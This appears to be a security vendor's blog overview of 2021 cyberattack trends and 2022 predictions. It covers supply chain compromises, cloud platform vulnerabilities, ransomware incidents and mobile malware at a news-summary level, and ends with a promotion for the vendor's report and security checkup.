The last couple of years have been far from ordinary, both for cybersecurity and business in general. The COVID-19 pandemic has permanently changed how business is done, and cybercriminals have adapted to these changes, tailoring their tactics to the new reality.
While 2020 and 2021 have been exceptional years for cyberattacks, there is little indication that things will return to “normal” in 2022. Cyber threat actors have tried new tactics and techniques, found them to be successful, and added them to their core arsenal.
In 2021, several cyberattack campaigns and cyber threat actors became household names as the impacts of cyberattack were felt far beyond their target companies. The modern threat landscape is composed of bigger, flashier, and higher-impact attacks as cybercrime becomes increasingly professionalized and cyber threat actors look to extract maximum value or impact from their attacks.
Below, we take a closer look at the major challenges that businesses faced through 2021, and what they can expect in 2022.
Every year, certain threats grow rapidly as cybercriminals focus their efforts on a particularly effective or lucrative attack technique, such as ransomware or cryptojacking. However, one of the most worrying trends in 2021 was the growth of cybercrime across the board.
In 2021, the total number of cyberattacks increased by 50% year over year. However, certain areas were harder hit than others with education, research, and healthcare bearing the brunt of the damage. This indicates a focus by cyber threat actors on the areas that are rapidly growing more reliant on technology and least prepared to protect themselves against cyber threats.
Such rapid growth in attacks bodes ill for 2022. As cyber threat actors refine their techniques and leverage machine learning and automation, the number and impacts of attacks is only likely to grow.
Supply chain attacks rose to prominence in late 2020, grew through 2021, and are likely to continue to be a major threat in 2022. In December 2020, the discovery of the SolarWinds hack led this trend.
Threat actors compromised SolarWinds’ development environment and inserted backdoor code into its Orion network monitoring product. The discovery of the Sunburst malware kicked off an extended investigation that uncovered not only the details of the SolarWinds hack but also multiple malware variants and an attack campaign that impacted over 18,000 public and private sector organizations.
SolarWinds kicked off a surge in supply chain attacks that continued throughout 2021 and into 2022. Another high-visibility supply chain exploit in 2021 was the Kaseya attack, which leveraged the relationships between managed service providers (MSPs) and customers to distribute ransomware using MSPs’ remote monitoring and management software. A few months later, an attacker with access to the npm account of a widely-used library (ua-parser.js), modified the code so that malware was installed on the systems of anyone who downloaded and used the malicious version of the library.
While these and other 2021 supply chain attacks had a far-reaching impact, the most famous is likely the exploitation of the Log4j zero-day vulnerability. Log4j is a widely-used Apache logging library, and the zero-day vulnerability allowed an attacker who could control the contents of log messages or their parameters to achieve remote code execution. This “Log4Shell” flaw was widely exploited with Check Point Research detecting about 40,000 attempted attacks within two hours of it becoming public and over 830,000 attempts within the first three days.
The high-profile supply chain attacks of 2021 have demonstrated that it is a viable and potentially profitable attack vector for cyber threat actors. Going into 2022, cyber threat actors are likely to expand their use of supply chain attacks to amplify the reach and impact of their attacks.
The COVID-19 pandemic drove a dramatic shift in how business was done. Instead of employees primarily working from the corporate office, a much greater percentage of the workforce is working remotely and is likely to continue to do so for the foreseeable future.
The pandemic kicked off a cyber pandemic as cyber threat actors adapted to and took advantage of changes in corporate IT operations. The rise of remote work made employees’ computers – often personal devices – a company’s first line of defense, and the surge in cloud adoption to support the remote workforce and meet digital transformation goals created new attack vectors for cyber threat actors.
Two years into the pandemic, little has changed. Many companies are still supporting a mostly or wholly remote workforce, and cloud adoption continues to grow. As cybercriminals continue to take advantage of the vulnerabilities and secure gaps caused by this rapid IT transformation, companies struggle to secure their systems and protect corporate and customer data.
With the pandemic-inspired shift to remote work came a rapid adoption of cloud-based infrastructure and services. Software as a Service (SaaS) solutions closed crucial gaps – such as the need for online meetings and file sharing – and cloud-based infrastructure was more accessible and easier to manage by a remote workforce.
Since the rapid shift to remote and the cloud in 2020, companies have had the opportunity to close many of the biggest security issues caused by a rapid transition with little or no advance planning. However, some cloud security gaps still remain, and cyber threat actors continue to work to outpace security personnel at taking advantage of the newly vital role that cloud computing holds in the modern business.
Many of these attacks target vulnerabilities in the cloud infrastructure itself, allowing an attacker to exploit many targets with a single vulnerability. In September 2021, the OMIGOD vulnerability was discovered. Exploitation of Microsoft’s Open Management Infrastructure (OMI) software agents embedded within Azure VMs could have enabled attacks against up to 65% of Azure customers until it was patched.
OMIGOD was not the only security issue discovered in Azure in 2021. The ChaosDB vulnerability discovered in August provided complete control over Azure Cosmos DB clients’ cloud resources through a compromised key. Azurescape targeted Azure’s Container as a Service (CaaS) offering and enabled exploitation of other customers’ Kubernetes clusters within the same public cloud service. While Azurescape was patched before it was exploited, the potential fallout could have been significant.
Azure is not the only cloud service that suffered from vulnerabilities and attacks in 2021. A vulnerability in Google’s Compute Engine (GCE), used in Google Cloud’s Infrastructure as a Service (IaaS) offering, could have allowed complete takeovers of hosted VMs. HTTP header smuggling can attack AWS’s API Gateway and Cognito (authentication provider) to evade access restrictions and perform cache poisoning. A configuration error in AWS permissions could allow AWS support personnel to read data stored in S3 buckets rather than just the metadata.
With increased cloud adoption comes increased scrutiny, both by ethical hackers and cyber threat actors. 2021’s example shows that it is likely that more cloud security issues will be discovered in 2022 and beyond.
Ransomware rose to prominence with the WannaCry outbreak in 2017. Since then, many ransomware groups have emerged, making it a top-of-mind and expensive threat for all businesses.
In 2021, ransomware groups demonstrated their ability and willingness to impact organizations beyond their direct targets. The Colonial Pipeline hack is the most obvious example of this as the Dark Side ransomware group caused a weeklong shutdown of one of the main pipelines servicing the US East Coast.
However, Colonial Pipeline, while possibly the most visible ransomware attack of 2021, is far from the only one. Another attack in the same month targeted JBS S.A., the biggest meat processing company in the world. This attack had international impacts, causing shutdowns of plants in the US and abattoirs in Australia that resulted in cancellations of 3,000 workers’ shifts and furloughs of 7,000 employees.
Beyond these high-profile attacks, ransomware groups also heavily targeted the education and healthcare sectors. These attacks caused school closures, loss of sensitive educational and healthcare information, and the delay of elective and non-emergency medical procedures. Multiple attacks by hacktivists caused public disruption in Iran by targeting railways and gas stations.
Ransomware attacks have proven to be effective and profitable for attackers. Unless this changes, they will continue to be a leading cyber threat for organizations.
Another impact of the shift to remote work was the widespread adoption of Bring-Your-Own-Device (BYOD) policies. By allowing employees to work from personal devices, companies may have improved productivity and employee retention but also lost vital security visibility and the ability to respond to infections that threaten corporate systems and solutions.
The upswing in mobile device usage has also made cyberespionage tools like Pegasus more effective and dangerous. Developed by the NSO Group, the malware uses several zero-click exploits to gain access to target devices before taking them over and collecting data from various sources (texts, phone, email, etc.). Pegasus is officially available only to governments, law enforcement, etc. but has a history of being abused to target journalists, activists, government officials, and business executives. Inspired by Pegasus’s success, Cytrox, a North Macedonian country, now offers a similar tool called Predator, and this threat is likely to spread to common cyber threat actors as well.
In 2021, cybercriminals adapted their tactics to take advantage of growing mobile adoption. Several mobile malware Trojans have emerged, including the FlyTrap, Triada, and MasterFred malware. These mobile Trojans take advantage of social media, weak app store security controls, and similar techniques to gain access and the necessary permissions on target devices.
Mobile malware and cyber threat actors have also adopted Smishing tactics, sending phishing content over SMS messages rather than email. The FluBot Android botnet is notorious for this, even using a text message about a fake FluBot infection to spread itself. Smishing attacks have caught on because they require few technical skills and are relatively inexpensive with phishing kits selling for $50-100 US.
Mobile devices have become a new front in the fight against cybercrime. For the modern business, mobile security is a key part of a corporate cybersecurity strategy.
2021 demonstrated that cyber threat actors are adapting their techniques to fit a changing world and reflect a maturing industry. Instead of remaining in the shadows, cybercriminals are pulling off massive supply chain attacks with global impacts, disrupting key industries with ransomware attacks, and molding their tactics to an increasingly mobile and cloud-centric workforce.
In 2022, companies can expect to face sophisticated attacks that target every part of their IT infrastructure, especially where they are weakest. Companies lack crucial visibility and control in the cloud and on BYOD devices, so those are cybercriminals’ prime targets.
Defending against modern cyber threat campaigns requires the ability to respond quickly and correctly to rapidly-evolving attacks that can strike anywhere within an organization’s IT infrastructure. Organizations need comprehensive security visibility, access to real-time threat intelligence, and an integrated security architecture that can support automated and coordinated threat prevention and response across the entire corporate IT infrastructure.
Learn how to develop your organization’s immunity to modern, 5th-generation cyber-attacks and threats by adopting the strategies and recommendations in the 2022 Cyber Security Report today. Start tackling the problem by identifying your company’s security blind spots and weak points with Check Point’s Security Checkup.